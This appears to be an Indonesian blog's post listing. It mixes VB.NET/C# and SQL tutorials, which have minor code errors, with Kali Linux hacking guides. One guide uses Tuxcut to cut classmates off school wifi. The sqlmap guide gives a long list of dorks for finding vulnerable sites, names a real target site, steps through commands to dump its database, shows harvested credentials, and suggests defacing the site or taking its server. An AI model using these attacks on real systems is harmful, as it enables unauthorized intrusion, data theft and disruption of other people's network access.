Membuat Auto Complete pada Datagridview dengan VB.NET dan C#

Membuat Auto Complete pada Datagridview dengan VB.NET dan C# - Setelah beberapa hari yang lalu saya sempat memposting tentang Copy Move Delete File dengan VB.NET dan C# pada postingan kali ini saya akan memposting tentang Membuat Auto Complete pada Datagridview dengan VB.NET dan C#, kebetulan karena lagi iseng-iseng browsing ternyata saya menemukan hal yang menarik, yaitu Auto Complete pada datagridview, oleh karena itu saya membuat postingan ini.

Saya juga telah membuat program sederhananya yang tentu saja bisa anda sesuaikan dengan kebutuhan anda sendiri, dan juga saya telah memberikan komentar - komentar untuk mempermudah dalam pemahaman code tersebut.

Berikut beberapa screenshotnya :

Anda dapat mendownload source codenya dibawah ini

| VB.NET | C# |

Untuk password silahkan klik disini

Untuk cara membuat Auto Complete silahkan kunjungi postingan saya sebelumnya Membuat Auto Complete Textbox di VB.NET dan Membuat Auto Complete Combobox di VB.NET

Sekian dari saya.

Terima kasih atas kunjugannya semoga bermanfaat

Read More

Copy Move Delete File dengan C# dan VB.NET

Copy Move Delete File dengan C# dan VB.NET - Pagi semua karena tadi malam saya sudah memposting tentang Penggunaan Left Mid Right di SQL, pada pagi hari ini saya akan memposting bukan tentang SQL lagi melainkan tentang C# dan VBNET.

Terkadang ketika kita membuat sebuah program kita ingin mengcopy file atau memindahkan file dan menghapus file tertentu, disini saya akan membagikan source code program sederhana yang telah saya buat,
dimana anda bisa mempelajari dan menyesuaikan dengan kebutuhan anda, tidak lupa saya juga telah memberikan beberapa komentar-komentar untuk memudahkan dalam memahami kode tersebut.
Berikut beberapa screenshotnya :

Ketika mengcopy file

Ketika memindahkan file

Ketika menghapus file

Anda dapat mendownload source codenya dibawah ini

| VB.NET | C# |

Untuk password silahkan klik disini

Sekian dari saya.
Terima kasih atas kunjugannya semoga bermanfaat

Read More

Penggunaan Fungsi LEFT MID RIGHT di SQL

Karena sudah lumayan semenjak postingan saya terkhir tentang SQL Penggunaan SUM MIN MAX COUNT AVG di SQL, pada malam hari ini saya kan membahas tentang Menggunakan Fungis Left Mid Right di SQL,
saya akan membahas ketiga fungsi tersebut

Contohnya kita mempunyai data sebagai berikut

LEFT()
Fungsi ini digunakan untuk mengambil karekter pada sebuah string dengan panjang tertentu yang di mulai dari kiri.

Misalkan kita ingin menampilkan nis dari 3 karakter paling kiri

select LEFT(nis,3) as nis,nama,alamat,kelamin,website from siswa

Maka data yang akan tampil ada seperti gambar dibawah ini

MID()
Fungsi ini digunakan untuk mengambil karakter pada sebuah string dimulai dari tengah

Misalkan kita ingin menampilkan nis dari karakter ke 4 sebanyak 3 karakter

SQL Server

select SUBSTRING(nis,4,3) as nis,nama,alamat,kelamin,website from siswa

MySQL

select MID(nis,4,3) as nis,nama,alamat,kelamin,website from siswa

karena di SQL Server tidak ada Fungsi MID maka kita bisa juga menggunakan Fungsi SUBSTRING sebagai pengganti MID

RIGHT()

Fungsi RIGHT hampir sama dengan fungsi left, fungsi ini mengambil karekter pada sebuah string dengan panjang tertentu yang di mulai dari kanan

Misalkan kita ingin menampilkan nis dari 2 karakter paling kanan

select RIGHT(nis23) as nis,nama,alamat,kelamin,website from siswa

Maka data yang akan tampil ada seperti gambar dibawah ini

Sekian dari saya.
Terima kasih atas kunjugannya semoga bermanfaat

Read More

Tutorial Scanning Website Dengan Vega Kali Linux

Tutorial Scanning Website Dengan Vega Kali Linux - Vega adalah scanner gratis dan open source dan platform penetration test untuk menguji keamanan aplikasi web. Vega dapat membantu Anda menemukan dan memvalidasi SQL Injection, Cross-Site Scripting (XSS),  mengungkapkan informasi sensitif, dan kerentanan lainnya. Scanner ini ditulis dalam bahasa Java, yang berbasis GUI, dan dapat berjalan pada Linux, OS X, dan Windows. oke kali ini saya akan memberikan Tutorial Scanning Website Dengan Vega Kali Linux.


Tutorial Scanning Website Dengan Vega Kali Linux


pertama hal yang harus di lakukan adalah membuka aplikasi Vega Web Vulnerability Scanner dengan cara Klik menu Applications > Kali Linux > Web Application > Web Vulnerability Scanner > Vega

setelah terbuka aplikasi Vega nya kita akan melihat workspace atau halaman kerja dari aplikasi ini banyak sekali command gui di aplikasi ini karna kita ingin cek vulnerability dari web atau bug atau celah web maka langkah yang harus kita lakukan adalah klik add di pojok kiri atas lalu masukan site yang ingin kita check bug nya

lalu jka sudah klik next disini kita bisa memilih tipe scanning nya sesuai selera tinggal di ganti saja di Injection Modules nya disitu ada pilihannya karena saya tidak akan mengganti optionnya maka saya biarkan default saja seperti itu

lalu kita klik next lagi

setelah itu klik finish maka akan terlihat paramater untuk scanning kita kali ini

setelah itu Vega akan memulai Scanning tunggu beberapa saat sampai Vega selesai scanning tunggu sampai selesai biasanya lebih dari 5 menit

Setalah itu akan terlihat banyak bug dari website tersebut seperti SQL Injection, Cross Site Scripting dan masih banyak bug tergantung dari web lainnya

lalu coba kita cek bug SQL Injection dengan XSS nya dengan cara copy paramater bug nya ke addres bar dan lihat web tersebut benar benar Vuln SQLI berarti Vega sudah menjalankan tugas nya dengan benar langkah selanjutnya bila anda ingin mengexploitasi web tersebut bisa liha tutorial nya disini Tutorial SQl Injection Dengan Sqlmap Kali Linux

lalu kita coba check celah Cross Site Scripting atau XSS nya dengan cara copy parameter bug yang kita dapat tadi ke browser lalu tambahkan script atau perintah exploitasi dengan XSS disini saya hanya simple saja sebagai contoh dan lihat XSS, berhasil lagi lagi Vega berhasil menjalankan tugas nya lagi

sekian dulu tutorial kali ini mengenai Tutorial Scanning Website Dengan Vega Kali Linux semoga bermanfaat bagi kalian semua dan ingat kalau ada penyalahgunaan dari tutorial ini itu diluar tanggung jawab saya gunakan ilmu dengan sebaik baiknya sekian dan
Terimakasih

Read More

Penggunaan Try Catch Finally di VB.NET dan C#

Setelah beberapa hari yang lalu saya memposting tentang Validasi URL dengan VB.NET dan C#, pada malam hari ini saya akan membahas tentang Penggunaan Try Catch Finally di VB.NET dan C#, terkadang ketika kita membuat sebuah program kita sering mengalami error dalam menjalankan program itu dan kita ingin menangkap kesalahan tersebut,, dengan Try Catch kita bisa menangkap kesalahan itu serta kita juga bisa memunculkan deskripsi dari kesalahan tersebut

Bentuk umum penulisan Try Catch
VB.NET

Try
   ' Block program yang akan dijalankan
Catch ex As Exception
   ' Block yang akan dijalankan jika terjadi kesahalan
Finally
   ' Block yang akan dijalankan di akhir
End Try

C#

try
{
      // Block program yang akan dijalankan
}
catch
{
     // block yang akan dijalankan jika terjadi kesalahan
}
finally
{
    // block yang akan dijalankan di akhir
}

Untuk lebih jelasnya anda bisa mencoba script dibawah ini
VB.NET

Try
    ' mengubah cursor menjadi waitcursor
    Me.Cursor = Cursors.WaitCursor
    ' membuat jeda selama 2 detik
    System.Threading.Thread.Sleep(2000)

    ' mendeklarasikan nilai yang akan dikalikan
    Dim nilai1 As Integer = CInt(textBox1.Text)
    Dim nilai2 As Integer = CInt(textBox2.Text)

    ' menghitung perkalian antara 2 nilai tersebut
    Dim hasil As Integer = nilai1 * nilai2
    ' menampilkan hasil perkalian ke textbox3
    textBox3.Text = hasil.ToString()
    Catch ex As Exception
    ' memunculkan pesan error
    MessageBox.Show(ex.Message, "Error", MessageBoxButtons.OK, MessageBoxIcon.Error)
Finally
    ' mengubah cursor menjadi default
    Me.Cursor = Cursors.Default
End Try

C#

try
{
    // mengubah cursor menjadi waitcursor
    Cursor.Current = Cursors.WaitCursor;
    // membuat jeda selama 2 detik
    System.Threading.Thread.Sleep(2000);

    // mendeklarasikan nilai yang akan di kalikan
    int nilai1 = Convert.ToInt16(textBox1.Text);
    int nilai2 = Convert.ToInt32(textBox2.Text);

    // menghitung perkalian antara 2 nilai tersebut
    int hasil = nilai1 * nilai2;
    // menampilkan hasil perkalian ke textbox3
    textBox3.Text = hasil.ToString();
}
    catch (Exception ex)
{
    // Memunculkan pesan error
                MessageBox.Show(ex.Message, "Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
}
finally
{
    // mengubah cursor menjadi default
    Cursor.Current = Cursors.Default;
}

Jalankan program tersebut dengan menekan F5

Program dijalankan dengan lancar

Program dijalankan dan terjadi error 

Anda dapat mendownload source codenya dibawah ini

| VB.NET | C# |

Untuk password silahkan klik disini

Sekian dari saya.
Terima kasih atas kunjugannya semoga bermanfaat

Read More

Cara Install Windows 7 Dan 8 Themes Kali Linux

Cara Install Windows 7 Dan 8 Themes Kali Linux - Linux adalah operating system yang sangat fleksibel selain open source linux juga mempunyai kelebihan lainnya seperti bisa mengubah tampilannya dengan beragam Desktop Enviroment seperti Gnome,Cinnamon,KDE,Unity dan lain lain bahkan baru baru ini ada themes baru yang mampu mengubah linux menjadi seperti windows 7 dan 8 dengan compton dan winate oke tidak perlu lama lagi saya akan memberitahukan tutorialnya di simak baik baik yah .

Cara Install Windows 7 Dan 8 Themes Kali Linux

pertama anda harus menginstall Desktop LXDE terlebih dahulu caranya buka terminal lalu ketikan perintah

apt-get install lxde

lalu setelah itu kita download package compton dengan masukan perintah ini tetap di terminal

wget : https://dl.dropboxusercontent.com/s/lmu2sykba2e6d5i/compton_0.1~beta2-1_i386.deb

setelah itu kita install package compton tadi dengan perintah

dpkg -i compton_0.1~beta2-1_i386.deb

langkah selanjutnya kita download wndows themes nya dengan masukan perintah berikut

wget : https://dl.dropboxusercontent.com/s/uoaapjc2a61f3or/Win-Ate-1.2.4.zip

lanjut kita unzip archive themes tadi dengan perintah

unzip Win-Ate-1.2.4.zip

setelah itu masuk ke folder winate tadi yang telah di extract lalu install theme windows dengan perintah

./install.sh 

kalau ada error seperti ini

error tersebut karena script diatas tidak dapat mengenali distro kita ( kali linux ) maka dari itu langkah selanjutnya kita mengganti perintah install yang pertama tadi dengan

./install --force

setelah itu akan ada dialog kita tekan enter aja untuk melanjutkan lalu kita disuruh memilih bahasa kita pilih english atau No 2 saja biar gampang xiixi kalau spanish ntar kgk ngerti lalau distro nya pilih Debian

Lalu disini kita disuruh pilih themes nya karena saya ingin themes windows 8 maka saya ketik 8 jika kalian ingin install windows 7 theme maka ketik 7

Setelah itu tunggu sampai windows themes nya terinstall paling lama cuman 1 menit doank

kalau sudah selesai tinggal reboot kali linux anda,sampai tahap ini themes nya sudah berhasil terinstall tinggal kita reboot saja dan pada saat login pilih LXDE

setelah reboot saat mau masuk login jangan login dulu ganti dulu sessions login yang asalnya System Default menjadi LXDE setelah itu silahkan login

setelah masuk lihatlah tampilan Kali Linux anda sudah berubah menjadi windows 8 :v xixii tinggal di oprek lagi biar lebih bagus + sesuai keinginan kalian karna theme nya gak langsung perfect harus di edit edit dulu gampang kok

Troubleshooting Error

jika terjadi error saat install compton seperti ini

root@kali:# dpkg -i compton_0.1~beta2-1_i386.deb 
Selecting previously unselected package compton.
(Reading database ... 291527 files and directories currently installed.)
Unpacking compton (from compton_0.1~beta2-1_i386.deb) ...
dpkg: dependency problems prevent configuration of compton:
compton depends on libc6 (>= 2.15); however:
Version of libc6:i386 on system is 2.13-38+deb7u1.

dpkg: error processing compton (--install):
dependency problems - leaving unconfigured
Processing triggers for man-db ...
Errors were encountered while processing:
compton

Cara Mengatasinya

Coba di tambah repo ini ke :

1. Buka file sources.list dengan perintah ini :
leafpad /etc/apt/sources.list

2. lalu masukan repo ini setelah itu save dan close
deb http://ftp.de.debian.org/debian sid main

3. lalu lakukan updatenya kembali :
apt-get update

4. kemudian, setelah update, lakukan perintah ini :
apt-get -f install {enter}

maka error pun akan hilang

Sekian dulu tutorial kali ini semoga bermanfaat thanks to : indonesian backtrack aceh sekian dan

Terimakasih

Read More

Validasi URL dengan VB.NET dan C#

Setelah beberapa hari yang lalu saya memposting tentang Penggunaan Array di VB.NET dan C#.

pada malam hari ini saya kan memposting tentang Validasi URL dengan VB.NET dan C#, sebernarnya langkah-langkahnya hampir sama dengan Validasi Email dengan VB.NET dan C# yang pernah saya bahas sebelumnya, yang membedakan hanya pola dari Regexnya saja.

Oke langsung saja

Langkah - langkah Membuat Validasi URL dengan VB.NET dan C#

1. Buatlah sebuah project pada visual studio yang anda punya

2. Tambahkan 1 buah textbox, button, dan label pada sebuah form, lalu desain form tersebut seperti gambar di bawah ini

3. Import sebuah namespace  System.Text.RegularExpressions dengan script dibawah ini

VB.NET

Imports System.Text.RegularExpressions

C#

Using Imports System.Text.RegularExpressions

4. Buatlah sebuah function dengan script dibawah ini

VB.NET

Private Function checkurl(ByVal strurl As String) As Boolean
        ' Menyiapkan string untuk menyimpan pola regex
        Dim pattern As String = "^(http|https|ftp|)\://|[a-zA-Z0-9\-\.]+\.[a-zA-Z](:[a-zA-Z0-9]*)?/?([a-zA-Z0-9\-\._\?\,\'/\\\+&%\$#\=~])*[^\.\,\)\(\s]$"

        If Regex.Match(strurl, pattern).Success Then ' Jika bernilai true
            ' Mengembailkan nilai false
            Return True
        Else
            ' Mengembailkan nilai false
            Return False
        End If
    End Function

C#

private Boolean checkurl(string strurl)
        {
            // Menyiapkan string untuk menyimpan pola regex
            string pattern = @"^(http|https|ftp|)\://|[a-zA-Z0-9\-\.]+\.[a-zA-Z](:[a-zA-Z0-9]*)?/?([a-zA-Z0-9\-\._\?\,\'/\\\+&%\$#\=~])*[^\.\,\)\(\s]$";
            
            if (Regex.Match(strurl,pattern).Success) // Jika bernilai true 
            {
                // Mengembalikan nilai true
                return true;
            }
            else
            {
                // Mengembalikan nilai false
                return false;
            }
        }

5. Pada event button1 click tambahkan script dibawah ini

VB.NET

Private Sub button1_Click(sender As Object, e As EventArgs) Handles button1.Click
        If checkurl(textBox1.Text) = True Then
            'Menampilkan pesan url valid
            MessageBox.Show("URL valid", "Informasi", MessageBoxButtons.OK, MessageBoxIcon.Information)
        Else
            ' Menampilkan pesan url tidak valid
            MessageBox.Show("URL tidak valid", "Peringatan", MessageBoxButtons.OK, MessageBoxIcon.Exclamation)
        End If
    End Sub

C#

private void button1_Click(object sender, EventArgs e)
        {
            // Memanggil function checkurl
            if (checkurl(textBox1.Text) == true) // Jika menghasilkan nilai true
            {
                // Menampilkan pesan url valid
                MessageBox.Show("URL valid", "Informasi", MessageBoxButtons.OK, MessageBoxIcon.Information);
            }
            else
            {
                // Menampilkan pesan url tidak valid
                MessageBox.Show("URL tidak valid", "Peringatan", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
            }
        }

6. Jalankan program tersebut dengan menekan F5

Jika url yang akan masukan benar

Jika url yang anda masukan salah

Anda dapat mendownload source codenya dibawah ini

| VB.NET | C# |

Untuk password silahkan klik disini

Sekian dari saya.
Terima kasih atas kunjugannya semoga bermanfaat

Read More

Memutuskan Koneksi Orang Lain Dengan Tuxcut Kali Linux

Memutuskan Koneksi Orang Lain Dengan Tuxcut Kali Linux - Tuxcut adalah sebuah program kecil yang berfungsi (netcut) "memotong koneksi jaringan dari pengguna di jaringan yang sama" berjalan pada sistem operasi linux. TuxCut adalah program yang sama seperti netcut (di Windows) yang biasanya berjalan dengan library visual basic, ini adalah program kecil dan kuat untuk membantu kita untuk aman dan aman koneksi internet kami dari `pengguna` yang rakus memakan banyak bandwidth, jadi intinya program ini dibuat untuk memutuskan koneksi orang lain dalam satu jaringan.

Memutuskan Koneksi Orang Lain Dengan Tuxcut Kali Linux

pertama yang harus anda lakukan adalah menginstall Software Tuxcut terlebih dahulu di kali linux kita.
Download terlebih dahulu disini , pilih tuxcut_5.1_all.deb 
Download Tuxcut 

Sebelum install Tuxcut, Persiapkan Aplikasi pendukung lainnya untuk memastikan aplikasi tuxcut ini berjalan dengan baik,,, oke lanjut ,, install aplikasi pendukung tuxcut dibawah ini:

Tuxcut membutuhkan modul2 lain, seperti
-arp-scan
-dsniff
-arp-tables

-wondershaper

jika belum mempunyai keempat itu download dan instal saja ,,,

1. arp-scan ( buka terminal lalu ketik ) :

   apt-get install arp-scan

2. dsnif

    apt-get install dsniff

3. arp-tables

    apt-get install arptables

4. wondershaper

 

    apt-get install wondershaper 

biasanya di kal linux sudah terinstall , jika sudah langkah selanjutnya kita install tuxcut nya pertama anda buka terminal lalu cari file Tuxcut yang kita download tadi kalau disini saya simpan di directory /Downloads lalu jalankan perintah

dpkg -i tuxcut_5.1_all.deb

jika sudah di install saatnya membuka aplikasi tersebut dengan cara buka menu
Applications > Internet > Tuxcut

setelah dibuka anda akan ada sebuah dialog anda disuruh memilih tipe jaringan anda bila anda menggunakan jaringan wireless atau wifi pilih wlan0 jika dalam koneksi Lan pilih eth0 karna saya memakai Lan maka saya pilih eth0

setelah itu akan terbuka aplikasi Tuxcut nya

- klik scan untuk scanning target...
- jika sudah muncul IP klik CUT untuk memutuskan koneksi korban
- Resume untuk menyambungkan lagi koneksi korban..
- Change MAC untuk menggantu MAC address
- Klik Protect Me untuk memproteksi koneksi anda agar tidak bisa di cut

* saya sudah mencoba pada jaringan Wireless ataupun LAN, dan Berhasil... dan lumayan koneksi saya jadi ngebut karna saya make wifi sekolah :v dan temen temen saya pada gak bisa connect wkwkowokowkow :v

sekian dulu artikel mengenai Memutuskan Koneksi Orang Lain Dengan Tuxcut Kali Linux saran saya jangan terlalu sering di pake kasian orang lain gak bisa internetan :v kwkwwkwk gunakan seperlunya saja sekian dari saya
Terimakasih

Read More

Tutorial Sql Injection Dengan SQLMAP Kali Linux

Tutorial Sql Injection Dengan SQLMAP Kali Linux - SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat memasukkan perintah-perintah SQL melalui url untuk dieksekusi oleh database. Penyebab utama dari celah ini adalah variable yang kurang di filter,jadi hacker dapat dengan mudah mendapatkan data dari website targetnya.

SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database.

oke setelah melihat tentang penjelasan tersebut kita akan langsung coba praktekan oke Tutorial Sql Injection Dengan SQLMAP Kali Linux

Tutorial Sql Injection Dengan SQLMAP Kali Linux

pertama yang harus anda lakukan adalah mencari target website yang vuln sql injection dengan menggunakan dork dibawah ini,copy paste dork ni di google

inurl:trainers.php?id= 
inurl:buy.php?category= 
inurl:article.php?ID= 
inurl:play_old.php?id= 
inurl:declaration_more.php?decl_id= 
inurl:pageid= 
inurl:games.php?id= 
inurl:page.php?file= 
inurl:newsDetail.php?id= 
inurl:gallery.php?id= 
inurl:article.php?id= 
inurl:show.php?id= 
inurl:staff_id= 
inurl:newsitem.php?num= 
inurl:readnews.php?id= 
inurl:top10.php?cat= 
inurl:historialeer.php?num= 
inurl:reagir.php?num= 
inurl:Stray-Questions-View.php?num= 
inurl:forum_bds.php?num= 
inurl:game.php?id= 
inurl:view_product.php?id= 
inurl:newsone.php?id= 
inurl:sw_comment.php?id= 
inurl:news.php?id= 
inurl:avd_start.php?avd= 
inurl:event.php?id=  
inurl:product-item.php?id= 
inurl:sql.php?id= 
inurl:news_view.php?id= 
inurl:select_biblio.php?id= 
inurl:humor.php?id= 
inurl:aboutbook.php?id= 
inurl:ogl_inet.php?ogl_id= 
inurl:fiche_spectacle.php?id= 
inurl:communique_detail.php?id= 
inurl:sem.php3?id= 
inurl:kategorie.php4?id= 
inurl:news.php?id= 
inurl:index.php?id=
inurl:faq2.php?id= 
inurl:show_an.php?id= 
inurl:preview.php?id= 
inurl:loadpsb.php?id= 
inurl:opinions.php?id= 
inurl:spr.php?id= 
inurl:pages.php?id= 
inurl:announce.php?id= 
inurl:clanek.php4?id= 
inurl:participant.php?id= 
inurl:download.php?id= 
inurl:main.php?id= 
inurl:review.php?id= 
inurl:chappies.php?id= 
inurl:read.php?id= 
inurl:prod_detail.php?id= 
inurl:viewphoto.php?id= 
inurl:article.php?id= 
inurl:person.php?id= 
inurl:productinfo.php?id= 
inurl:showimg.php?id= 
inurl:view.php?id= 
inurl:website.php?id= 
inurl:hosting_info.php?id= 
inurl:gallery.php?id= 
inurl:rub.php?idr= 
inurl:view_faq.php?id= 
inurl:artikelinfo.php?id= 
inurl:detail.php?ID= 
inurl:index.php?= 
inurl:profile_view.php?id= 
inurl:category.php?id= 
inurl:publications.php?id= 
inurl:fellows.php?id= 
inurl:downloads_info.php?id= 
inurl:prod_info.php?id= 
inurl:shop.php?do=part&id= 
inurl:productinfo.php?id= 
inurl:collectionitem.php?id= 
inurl:band_info.php?id=  
inurl:product.php?id= 
inurl:releases.php?id= 
inurl:ray.php?id= 
inurl:produit.php?id= 
inurl:pop.php?id= 
inurl:shopping.php?id= 
inurl:productdetail.php?id= 
inurl:post.php?id= 
inurl:viewshowdetail.php?id= 
inurl:clubpage.php?id= 
inurl:memberInfo.php?id= 
inurl:section.php?id= 
inurl:theme.php?id= 
inurl:page.php?id= 
inurl:shredder-categories.php?id= 
inurl:tradeCategory.php?id= 
inurl:product_ranges_view.php?ID= 
inurl:shop_category.php?id= 
inurl:transcript.php?id= 
inurl:channel_id= 
inurl:item_id= 
inurl:newsid= 
inurl:trainers.php?id= 
inurl:news-full.php?id= 
inurl:news_display.php?getid= 
inurl:index2.php?option= 
inurl:readnews.php?id= 
inurl:top10.php?cat= 
inurl:newsone.php?id= 
inurl:event.php?id= 
inurl:product-item.php?id= 
inurl:sql.php?id= 
inurl:aboutbook.php?id= 
inurl:preview.php?id= 
inurl:loadpsb.php?id= 
inurl:pages.php?id= 
inurl:material.php?id= 
inurl:clanek.php4?id= 
inurl:announce.php?id= 
inurl:chappies.php?id= 
inurl:read.php?id= 
inurl:viewapp.php?id= 
inurl:viewphoto.php?id= 
inurl:rub.php?idr= 
inurl:galeri_info.php?l= 
inurl:review.php?id= 
inurl:iniziativa.php?in= 
inurl:curriculum.php?id= 
inurl:labels.php?id= 
inurl:story.php?id= 
inurl:look.php?ID= 
inurl:newsone.php?id= 
inurl:aboutbook.php?id=  
inurl:material.php?id= 
inurl:opinions.php?id= 
inurl:announce.php?id= 
inurl:rub.php?idr= 
inurl:galeri_info.php?l= 
inurl:tekst.php?idt= 
inurl:newscat.php?id= 
inurl:newsticker_info.php?idn= 
inurl:rubrika.php?idr= 
inurl:rubp.php?idr= 
inurl:offer.php?idf=
inurl:art.php?idm= 
inurl:title.php?id= 
buy.php?category= 
article.php?ID= 
play_old.php?id= 
declaration_more.php?decl_id= 
Pageid= 
games.php?id= 
page.php?file= 
newsDetail.php?id= 
gallery.php?id= 
article.php?id= 
play_old.php?id= 
show.php?id= 
staff_id= 
newsitem.php?num= 
readnews.php?id= 
top10.php?cat= 
historialeer.php?num= 
reagir.php?num= 
forum_bds.php?num= 
game.php?id= 
view_product.php?id= 
newsone.php?id= 
sw_comment.php?id= 
news.php?id= 
avd_start.php?avd= 
event.php?id= 
product-item.php?id= 
sql.php?id= 
news_view.php?id= 
select_biblio.php?id= 
humor.php?id= 
aboutbook.php?id= 
fiche_spectacle.php?id= 
communique_detail.php?id= 
sem.php3?id= 
kategorie.php4?id= 
faq2.php?id= 
show_an.php?id= 
preview.php?id= 
loadpsb.php?id=  
opinions.php?id= 
spr.php?id= 
pages.php?id= 
announce.php?id= 
clanek.php4?id= 
participant.php?id= 
download.php?id= 
main.php?id= 
review.php?id= 
chappies.php?id= 
read.php?id= 
prod_detail.php?id= 
viewphoto.php?id= 
article.php?id= 
play_old.php?id= 
declaration_more.php?decl_id= 
category.php?id= 
publications.php?id= 
fellows.php?id= 
downloads_info.php?id= 
prod_info.php?id= 
shop.php?do=part&id= 
Productinfo.php?id= 
website.php?id= 
Productinfo.php?id=
showimg.php?id= 
view.php?id= 
rub.php?idr= 
view_faq.php?id= 
artikelinfo.php?id= 
detail.php?ID= 
collectionitem.php?id= 
band_info.php?id= 
product.php?id= 
releases.php?id= 
ray.php?id= 
produit.php?id= 
pop.php?id= 
shopping.php?id= 
productdetail.php?id= 
post.php?id= 
viewshowdetail.php?id= 
clubpage.php?id= 
memberInfo.php?id= 
section.php?id= 
theme.php?id= 
page.php?id= 
shredder-categories.php?id= 
tradeCategory.php?id= 
shop_category.php?id= 
transcript.php?id= 
channel_id= 
item_id=  
newsid= 
trainers.php?id= 
buy.php?category= 
article.php?ID= 
play_old.php?id= 
iniziativa.php?in= 
detail_new.php?id= 
tekst.php?idt= 
newscat.php?id= 
newsticker_info.php?idn= 
rubrika.php?idr= 
rubp.php?idr= 
offer.php?idf=
hotel.php?id= 
art.php?idm= 
title.php?id= 
look.php?ID= 
story.php?id= 
labels.php?id= 
review.php?id= 
chappies.php?id= 
news-full.php?id= 
news_display.php?getid= 
index2.php?option= 
ages.php?id= 
"id=" & intext:"Warning: mysql_fetch_assoc() 
"id=" & intext:"Warning: mysql_fetch_array() 
"id=" & intext:"Warning: mysql_num_rows() 
"id=" & intext:"Warning: session_start() 
"id=" & intext:"Warning: getimagesize()
"id=" & intext:"Warning: Unknown() 
"id=" & intext:"Warning: pg_exec() 
"id=" & intext:"Warning: array_merge() 
"id=" & intext:"Warning: mysql_result() 
"id=" & intext:"Warning: mysql_num_rows() 
"id=" & intext:"Warning: mysql_query()
"id=" & intext:"Warning: filesize()

lalu setelah mendapatkan target kita coba tambahkan tanda ' pada ujung addres bar website target disini saya mempunyai website dengan bug sql injection yaitu http://www.woodbridgeparty.com/products.php?id=111 setelah itu saya coba tambahkan tanda petik di ujung angka 111 seperti ini http://www.woodbridgeparty.com/products.php?id=111' maka akan ada error berarti web itu vuln sql injection dan kita bisa lanjutakan tahap berikutnya yaitu menginject bug tersebut dengan sqlmap

setelah itu buka terminal dan masukan perintah berikut :
sqlmap -u http://website-target.com/contoh.php?id=1 --dbs silahkan ganti website target sesuai website yang kita inject yang memiliki bug sql injection seperti diatas

setalah itu tekan enter dan tunggu sampai sqlmap mendapatkan informasi database target proses ini kira kira sekitar 5 menit tergantu koneksi anda, setelah selesai kita akan mendapatkan database target maka langkah selanjutnya menampilkan tables database tersebut denga perintah :
sqlmap -u http://website-target.com/contoh.php?id=1 -D namadatabase --tables

setelah itu tekan enter dan tunggu beberapa saat sampai sqlmap mendapatkan tables dari database website tersebut jika sudah maka akan tampil tables database website tersebut langkah selanjutnya kita jalankan perintah untuk mengetahui isi columns dari tables database tersebut dengan perintah :
sqlmap -u http://website-target.com/contoh.php?id=1 -D namadatabase -T namatables --columns

tunggu beberapa saat sampai sqlmap menampilkna data columns dari tables databas web tersebut setelah mendapatkan columns database tersebut langkah terakhir kita hanya perlu men dump data columns tersebut dengan perintah :

sqlmap -u http://website-target.com/contoh.php?id=1 -D namadatabase -T namatables -C namacolumn,namacolumn2 --dump

tunggu beberapa saat sampai sqlmap berhasil mendump data columns database tersebut setelah selesai maka kita akan mendapatkan data web tersebut 

dan akhirnya kita mendapatkan user dan pass web tersebut

+--------------------------+----------------------------------+
| uname                | upass                          |
+-------------------------+-----------------------------------+
| js7Xzco=            | jN/O193KyA==          |
| k9bIzMrTxw== | k9bIzMrTx6PU0A== |
+-------------------------+-----------------------------------+

tinggal kita kembangkan lagi sesuai keinginan kita contoh nya kita ingin dump table lain kita tinggal ganti nama tables nya dan kesananya sama saja setelah sampai tahap ini tinggal kita cari halaman admin web tersebut terserah deh web itu mau di apain ntah itu di deface di ambil server nya dan lain lain saya di sini cuman share ilmu yang saya miliki saja selebihnya jika di salahgunakan itu bukan tanggung jawab saya . sekian Tutorial Sql Injection Dengan SQLMAP Kali Linux kali ini semoga bermanfaat 

Terimakasih

Read More